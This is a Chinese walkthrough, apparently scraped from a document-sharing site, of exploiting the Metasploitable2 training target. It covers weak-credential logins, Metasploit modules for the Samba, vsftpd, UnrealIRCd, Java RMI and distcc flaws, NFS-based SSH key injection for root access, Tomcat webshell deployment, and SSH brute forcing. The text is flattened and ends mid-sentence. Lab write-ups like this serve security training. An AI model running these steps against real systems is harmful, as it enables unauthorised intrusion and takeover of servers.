Metasploitable2靶机漏洞hanxuWord文件下载.docx
《Metasploitable2靶机漏洞hanxuWord文件下载.docx》由会员分享,可在线阅读,更多相关《Metasploitable2靶机漏洞hanxuWord文件下载.docx(27页珍藏版)》请在冰豆网上搜索。
利用步骤
Ø
系统弱密码登录
1.在kali上执行命令行telnet7.7.5.25123
2.login和password都输入msfadmin
3.登录成功,进入系统
4.
5.相同的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/service
MySQL弱密码登录
1.在kali上执行mysql–h7.7.5.251–uroot
2.登录成功,进入mysql系统
3.
PostgreSQL弱密码登录
1.在kali上执行psql–h7.7.5.251–Upostgres
2.输入密码postgres
3.登录成功,进入postgresql系统
VNC弱密码登录
1.在kali图形界面的终端中执行vncviewer7.7.5.251
2.输入密码password
5.
攻击样本
对应规则
友商防护能力
SambaMS-RPCShell命令注入漏洞
CVE-2007-2447
BID-23972
OSVDB-34700
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
http:
//samba.org/samba/security/CVE-2007-2447.html
XeroxWorkCentrePro
XeroxWorkCentre
VMWareESXServer
TurbolinuxServer/Personal/Multimedia/Home/Desktop/Appliance/FUJI
TrustixSecureLinux
SUSELinuxEnterprise
SunSolaris
SlackwareLinux
RedHatEnterprise
MandrivaLinux
MandrakeSoftCorporateServer
HPHP-UX
GentooLinux
DebianLinux
AppleMacOSX
Kali,Metasploit
1.在kali中执行msfconsole,启动metasploit
2.useexploit/multi/samba/usermap_script,选择漏洞
3.setRHOST7.7.5.251,设置要攻击的机器IP
4.exploit,开始攻击
5.利用成功,执行uname–a验证
6.
Vsftpd源码包后门漏洞
BID-48539
OSVDB-73573
在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:
)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
Vsftpdserverv2.3.4
2.useexploit/unix/ftp/vsftpd_234_backdoor,选择漏洞
UnrealIRCd后门漏洞
CVE-2010-2075
BID-40820
OSVDB-65445
在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
UnrealUnrealIRCd3.2.8.1
2.useexploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞
LinuxNFS共享目录配置漏洞
无
NFS服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登陆。
所有Linux系统的NFS服务
1.在kali上执行命令行rpcinfo–p7.7.5.251,查看nfs服务有无开启:
2.用showmount-e7.7.5.251查看其设置的远程共享目录列表:
3.输入ssh-keygen生成rsa公钥:
4.依次输入
●mount–tnfs7.7.5.251:
//tmp/t00l(预先创建),把7.7.5.251的根目录挂载到/tmp/t00l/下;
注:
如果提示下图中错误则需要/etc/init.d/rpcbindstart来启动mount
●cat/root/.ssh/id_rsa.pub>
>
/tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;
●sshroot@7.7.5.251,实现无密码登陆
JavaRMISERVER命令执行漏洞
17535
JavaRMIServer的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行
OracleJavaRMIServer
Metasploit
1.Nmap–p0-655357.7.5.251来查看1099端口是否开启
2.依次输入以下命令:
●useexploit/multi/misc/java_rmi_server
●setRHOST7.7.5.251(靶机IP)
●exploit
●shell(进入meterpreter时执行)
然后即可获得shell了
Tomcat管理台默认口令漏洞
Tomcat管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.
Tomcat
Nessus
JSPwebshell
1.访问7.7.5.251:
8081,点击tomcatmanager,输入tomcat/tomcat,即可进入管理台
2.在自己机器上准备好JSPwebshell(liuz.jsp),通过jar–cvf来打包成liuz.war
3.通过tomcat管理台deploy刚才打包的liuz.war
4.打包成功可以看到应用目录生成(/liuz)
5.访问7.7.5.251/liuz/liuz.jsp得到webshell
Root用户弱口令漏洞(SSH爆破)
靶机root用户存在弱口令漏洞,在使用指南里并没有指出。
.
Linux
metasploit
1.输入nmap–sV–O7.7.5.251,查看SSH端口是否开启:
2.打开metasploitframework依次输入:
useauxiliary/scanner/ssh/ssh_login
setRHOSTS7.7.5.251
setUSERNAMEroot
setPASS_FILE/tmp/r00t/pass.txt(字典文件,需要预先生成)
setTHREADS50
run
root口令爆破成功,口令为root
3.sshroot@7.7.5.251成功登陆:
Distcc后门漏洞
CVE-2004-2687
OSVDB-13378
Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode1.5版本及其他版本的distcc2.x版本配置对于服务器端口的访问不限制。
//cve.mitre.org/cgi-bin/cvename.cgi?
name=2004-2687
distcc2.x
2.msf>
useexploit/unix/misc/distcc_exec,选择漏洞
5.利用成功,执行id查看权限,uname–a验证服务器信息
Sambasysmlink默认配置目录遍历漏洞
CVE-2010-0926
33598
OSVDB-62145
Samba是一套实现SMB(servermessagesbloc